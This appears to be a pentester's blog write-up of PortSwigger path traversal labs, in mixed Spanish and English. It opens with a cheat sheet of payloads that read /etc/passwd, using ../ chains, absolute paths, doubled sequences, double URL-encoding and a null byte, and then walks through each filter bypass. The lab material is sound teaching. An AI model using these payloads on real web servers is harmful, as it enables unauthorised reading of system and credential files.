PyUs3r

PyUs3r

Pentester | Bug Bounty Hunter | Cybersecurity | AI & n8n

Path Traversal - PortSwigger

Path Traversal Cheet Sheat

  • Agartha Burp Extension

  • Simple Case
../../../../../../../../../../../etc/passwd
  • Absolute Path
/etc/passwd
  • Doble ../
....//....//....//....//....//....//etc/passwd
  • Doble URL-Encode ../
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65/etc/passwd
  • Validation of start of path
/var/www/images/../../../../../../etc/passwd
  • Null Byte
../../../../../../../etc/passwd%00.jpg

Bypass absoluto con secuencias bloqueadas || File path traversal, traversal sequences blocked with absolute path bypass

If we try to do Path Traversal we see that the server does not interpret the file.

When using the absolute path the server does return the file contents.

Secuencias traversal eliminadas sin recursión || File path traversal, traversal sequences stripped non-recursively

We test the basic payload and see that we do not pass validation.

To bypass the block we can make use of double ../

Bypass con doble decodificación en URL || File path traversal, traversal sequences stripped with superfluous URL-decode

We test the basic LFI payload and see that it is not being interpreted.

With the Agartha extension we create a wordlist with different payloads.

With a double URL-encode we bypass the restriction.

Validación del inicio de la ruta || File path traversal, validation of start of path

We see the server loading an image with the absolute path.

If we try to do a Path Traversal after the jpg file, we see the server does not return the contents of /etc/passwd.

If we do the same but from the images directory, we see that it does allow us to read the contents of /etc/passwd.

Bypass con null byte y validación de extensión || File path traversal, validation of file extension with null byte bypass

We try to inject the basic payload and see that the server does not allow us to read the contents of /etc/passwd

To be able to read the contents we can make use of null bytes. Null bytes allow disabling the final extension, so if there is a validation that forces loading .jpg files, we will be tricking the server.